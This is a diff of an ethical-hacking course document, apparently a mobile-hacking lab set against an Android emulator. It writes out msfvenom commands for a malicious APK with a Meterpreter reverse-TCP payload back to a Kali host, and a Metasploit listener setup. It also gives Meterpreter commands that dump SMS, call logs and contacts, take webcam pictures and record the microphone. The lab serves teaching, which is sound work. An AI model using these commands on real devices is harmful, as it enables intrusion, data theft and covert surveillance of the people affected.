--- a/EH/Lab3- Mobile Hacking/Mobile Hacking.docx
+++ b/EH/Lab3- Mobile Hacking/Mobile Hacking.docx
@@ -240,6 +240,46 @@
       <w:r>
         <w:t>### **Step 2: Connect Kali Linux to the Emulator**  </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04E6E405" wp14:editId="68064DF8">
+            <wp:extent cx="5731510" cy="4137660"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="426032195" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="426032195" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="4137660"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
       <w:r>
         <w:br/>
         <w:t>1. Open the terminal in Kali Linux and verify ADB (Android Debug Bridge) is installed:  </w:t>
@@ -271,6 +311,117 @@
       <w:r>
         <w:br/>
         <w:t>2. Connect Kali to the emulator:  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   ```bash</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> shell</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   ```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>---</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>## **Lab 2: Exploiting an Android Device Using Metasploit**  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>We will create an Android backdoor and execute it in the emulator.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>### **Step 1: Generate a Malicious APK**  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>1. Use **</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>** to create a payload:  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   ```bash</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -p android/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> LHOST=&lt;Kali-IP&gt; LPORT=4444 -o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malicious.apk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>   ```</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>2. Install the APK in the emulator:  </w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -289,8 +440,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> shell</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>malicious.apk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:br/>
         <w:t>   ```</w:t>
@@ -303,6 +459,86 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>### **Step 2: Set Up a Listener in Metasploit**  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>1. Start Metasploit Framework:  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   ```bash</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>   ```</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>2. Set up the multi-handler:  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   ```bash</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   use exploit/multi/handler</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   set payload android/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>   set LHOST &lt;Kali-IP&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   set LPORT 4444</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   exploit</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>   ```</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>3. If the APK is executed in the emulator, you will get a Meterpreter session.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>---</w:t>
       </w:r>
     </w:p>
@@ -313,202 +549,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>## **Lab 2: Exploiting an Android Device Using Metasploit**  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>We will create an Android backdoor and execute it in the emulator.  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>### **Step 1: Generate a Malicious APK**  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>1. Use **</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>** to create a payload:  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   ```bash</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -p android/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> LHOST=&lt;Kali-IP&gt; LPORT=4444 -o </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>malicious.apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>   ```</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>2. Install the APK in the emulator:  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   ```bash</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>adb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>malicious.apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>   ```</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>### **Step 2: Set Up a Listener in Metasploit**  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>1. Start Metasploit Framework:  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   ```bash</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>   ```</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>2. Set up the multi-handler:  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   ```bash</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   use exploit/multi/handler</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   set payload android/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>   set LHOST &lt;Kali-IP&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   set LPORT 4444</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   exploit</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>   ```</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>3. If the APK is executed in the emulator, you will get a Meterpreter session.  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>---</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t>## **Lab 3: Extracting Data from an Android Device**  </w:t>
       </w:r>
       <w:r>
@@ -534,93 +574,93 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:t>dump_sms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dump_calllog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>### **Step 2: Extract Contacts**  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>```bash</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dump_contacts</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>### **Step 3: Activate Camera and Record Audio**  </w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>```bash</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webcam_snap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>record_mic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> -d 10</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>dump_sms</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dump_calllog</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>```</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>### **Step 2: Extract Contacts**  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>```bash</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dump_contacts</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-        <w:t>```</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>### **Step 3: Activate Camera and Record Audio**  </w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>```bash</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>webcam_snap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>record_mic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -d 10</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>```</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
         <w:t>---</w:t>
       </w:r>
     </w:p>
@@ -1340,6 +1380,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
